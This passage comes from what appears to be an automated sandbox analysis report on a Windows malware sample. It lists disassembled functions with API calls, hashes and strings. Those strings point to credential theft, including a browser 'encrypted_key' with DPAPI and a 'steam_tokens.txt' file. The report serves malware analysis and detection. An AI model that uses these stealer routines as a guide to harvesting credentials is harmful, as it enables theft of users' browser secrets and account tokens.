                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                        • String ID:
                        • API String ID: 174687898-0
                        • Opcode ID: 7adb4c7010751f763dea3d09cd674beb2f90ae6b5ea585ed58d4ba2d5c6da9de
                        • Instruction ID: bbde956c1fef048657e0183616ee9687afba59fb071cfd2487e7da5fa09de7f1
                        • Opcode Fuzzy Hash: 7adb4c7010751f763dea3d09cd674beb2f90ae6b5ea585ed58d4ba2d5c6da9de
                        • Instruction Fuzzy Hash: B0414B71B056069FEB20CFA9EC84BAAF3E8BB84325F144569EC59C7380E671F950DA50
                        Function 00909C70 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 124memorystringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000), ref: 00909CA8
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00909CDA
                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00909D03
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocLocallstrcpy
                        • String ID: $"encrypted_key":"$DPAPI
                        • API String ID: 2746078483-738592651
                        • Opcode ID: 1a929056c878d90abff228f66a078299077a7ea10aaf22182fde8db967f9453a
                        • Instruction ID: a5f81e9bf32d8051f91c5e9859116fd18aa6036c3968284b48a8485f3a8b7fc3
                        • Opcode Fuzzy Hash: 1a929056c878d90abff228f66a078299077a7ea10aaf22182fde8db967f9453a
                        • Instruction Fuzzy Hash: C4417C72A0021A9FDB21EF68D9856EFB7B8AF95304F044564F955A72E3DA30AD04CB90
                        Function 0091E9E0 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON
                        Download Yara Rule
                        APIs
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0091EA24
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091EA53
                        • lstrcat.KERNEL32(?,00000000), ref: 0091EA61
                        • lstrcat.KERNEL32(?,00931794), ref: 0091EA7A
                        • lstrcat.KERNEL32(?,015E8908), ref: 0091EA8D
                        • lstrcat.KERNEL32(?,00931794), ref: 0091EA9F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FolderPathlstrcpy
                        • String ID:
                        • API String ID: 818526691-0
                        • Opcode ID: 752a965ea3372a915528874ab8fe5a2a603028d5a721152eb3fa21e92c4a9375
                        • Instruction ID: c72fd5c837a4b80dbbf6a6767d82475c7caaecf29f669b53a05c64aa821e1d83
                        • Opcode Fuzzy Hash: 752a965ea3372a915528874ab8fe5a2a603028d5a721152eb3fa21e92c4a9375
                        • Instruction Fuzzy Hash: BC415571B10119AFCB55EB68DD46FED7778FF88300F1044A8BA1A972D1DE709E888B91
                        Function 0091ECB0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0091ECDF
                        • lstrlen.KERNEL32(00000000), ref: 0091ECF6
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091ED1D
                        • lstrlen.KERNEL32(00000000), ref: 0091ED24
                        • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 0091ED52
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID: steam_tokens.txt
                        • API String ID: 367037083-401951677
                        • Opcode ID: dbe36c5ca1e973f48026310293466455e4c652b460cc77af0cd0de1e65fe9f40
                        • Instruction ID: c2380a7d69e2f8b64cd0b83930070dc11a85a91d8e30f672989895c4f932e513
                        • Opcode Fuzzy Hash: dbe36c5ca1e973f48026310293466455e4c652b460cc77af0cd0de1e65fe9f40
                        • Instruction Fuzzy Hash: DA315E31B105195FC722BB78FE4EAAE7BA8AF90300F154120B846DB2D2DF24DD498BD1
                        Function 00909A80 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,0090140E), ref: 00909A9A
                        • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0090140E), ref: 00909AB0
                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,0090140E), ref: 00909AC7
                        • ReadFile.KERNEL32(00000000,00000000,?,0090140E,00000000,?,?,?,0090140E), ref: 00909AE0
                        • LocalFree.KERNEL32(?,?,?,?,0090140E), ref: 00909B00
                        • CloseHandle.KERNEL32(00000000,?,?,?,0090140E), ref: 00909B07
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                        • String ID:
                        • API String ID: 2311089104-0
                        • Opcode ID: e718dd46d65ad7c65c190c5a278cd57302684cf44204aabbb8bcacaf5dc3db3e
                        • Instruction ID: 48431d6948f370e2cc4b0e77e83f559c2a1edcb7e051f6ef8178a84e13df7c2b
                        • Opcode Fuzzy Hash: e718dd46d65ad7c65c190c5a278cd57302684cf44204aabbb8bcacaf5dc3db3e
                        • Instruction Fuzzy Hash: 18115B71600209AFEB10DFA9DDC8AAE736CEB44350F200659F905A72C1EB709D10CBA1
                        Function 00925AD0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135COMMON
                        Download Yara Rule
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00925B14
                          • Part of subcall function 0092A173: std::exception::exception.LIBCMT ref: 0092A188
                          • Part of subcall function 0092A173: std::exception::exception.LIBCMT ref: 0092A1AE
                        • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00925B7C
                        • memmove.MSVCRT(00000000,?,?), ref: 00925B89
                        • memmove.MSVCRT(00000000,?,?), ref: 00925B98
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                        • String ID: vector<T> too long
                        • API String ID: 2052693487-3788999226
                        • Opcode ID: c0adcfc1cedbc78e0c7b06b1463aae718d184ad3617d5cba4dd94f9f63c5efbb
                        • Instruction ID: 574472fd31a7d39140ea80a2620bcb0893e880223c8ba5e99dd5f357098d87f5
                        • Opcode Fuzzy Hash: c0adcfc1cedbc78e0c7b06b1463aae718d184ad3617d5cba4dd94f9f63c5efbb
                        • Instruction Fuzzy Hash: 6D417371B005199FCF08DF6CD995A6EB7F5EB88310F158229E905E7348E630DD00CB90
                        Function 00917D40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON
                        Download Yara Rule
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00917D58
                          • Part of subcall function 0092A1C0: std::exception::exception.LIBCMT ref: 0092A1D5
                          • Part of subcall function 0092A1C0: std::exception::exception.LIBCMT ref: 0092A1FB
                        • std::_Xinvalid_argument.LIBCPMT ref: 00917D76
                        • std::_Xinvalid_argument.LIBCPMT ref: 00917D91
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xinvalid_argumentstd::_$std::exception::exception
                        • String ID: invalid string position$string too long
                        • API String ID: 3310641104-4289949731
                        • Opcode ID: 760e81ce48885b3eeda942b9fe641c160e10ae29395e8994d0cc30e12db8f5ec
                        • Instruction ID: f85412d36cf82c89998fa65cc223b8cc8f33d26d7eb04f126b555fddb5918fd2
                        • Opcode Fuzzy Hash: 760e81ce48885b3eeda942b9fe641c160e10ae29395e8994d0cc30e12db8f5ec
                        • Instruction Fuzzy Hash: 8821B93230420A5BD720DEACE881A7AF7F9AFD1750F214A6EE452CB291D771DC808765
                        Function 009233C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009233EF
                        • RtlAllocateHeap.NTDLL(00000000), ref: 009233F6
                        • GlobalMemoryStatusEx.KERNEL32 ref: 00923411
                        • wsprintfA.USER32 ref: 00923437
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                        • String ID: %d MB
                        • API String ID: 2922868504-2651807785
                        • Opcode ID: 8419f6d6551efb266e39170d69aa23b18a44b8fbbe75ece2b0256c95b1414b30
                        • Instruction ID: d7912231fdb083818bc554a5712330d31faff031a8c60f62a490867e972ba80c
                        • Opcode Fuzzy Hash: 8419f6d6551efb266e39170d69aa23b18a44b8fbbe75ece2b0256c95b1414b30
                        • Instruction Fuzzy Hash: A201D871A04614AFDB04DF98DD45B6EB7BCFB44710F104629F906E7380DBB8590087A5
                        Function 0091D7B0 Relevance: 7.6, APIs: 5, Instructions: 127registrystringCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,015EF0D0,00000000,00020119,?), ref: 0091D7F5
                        • RegQueryValueExA.ADVAPI32(?,015EFFA0,00000000,00000000,00000000,000000FF), ref: 0091D819
                        • RegCloseKey.ADVAPI32(?), ref: 0091D823
                        • lstrcat.KERNEL32(?,00000000), ref: 0091D848
                        • lstrcat.KERNEL32(?,015F0078), ref: 0091D85C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$CloseOpenQueryValue
                        • String ID:
                        • API String ID: 690832082-0
                        • Opcode ID: 20931d879f18c38a0c6d6164d3af7ec0fa318a2ded5d1456960c1f5d85f6fadd
                        • Instruction ID: ef7792a481e839481d4405570adec64c987542f49ebe2f57fc2f3dc16f10656c
                        • Opcode Fuzzy Hash: 20931d879f18c38a0c6d6164d3af7ec0fa318a2ded5d1456960c1f5d85f6fadd
                        • Instruction Fuzzy Hash: 9B413275A1020CAFCB54EF68EC86BDE7779AF94304F504064B50997291EE30AA89CF91
                        Function 00917EE0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(00000000), ref: 00917F31
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00917F60
                        • StrCmpCA.SHLWAPI(00000000,00934C3C), ref: 00917FA5
                        • StrCmpCA.SHLWAPI(00000000,00934C3C), ref: 00917FD3
                        • StrCmpCA.SHLWAPI(00000000,00934C3C), ref: 00918007
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: daef36af42dc261e5f8e620f4e1d3edcc82d35db4b0f5e1ad8d8acd285abfc9a
                        • Instruction ID: 93eb975ecd7a82eebe3fff5c9719d1485110d925d629c91e8d36c8a3bd526024
                        • Opcode Fuzzy Hash: daef36af42dc261e5f8e620f4e1d3edcc82d35db4b0f5e1ad8d8acd285abfc9a
                        • Instruction Fuzzy Hash: 82416D7060411ADFCB20DFA8D884EEEB7B8FF54300F114599E8069B351DB74AAA6CF91
                        Function 00918050 Relevance: 7.6, APIs: 5, Instructions: 114stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(00000000), ref: 009180BB
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009180EA
                        • StrCmpCA.SHLWAPI(00000000,00934C3C), ref: 00918102
                        • lstrlen.KERNEL32(00000000), ref: 00918140
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091816F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
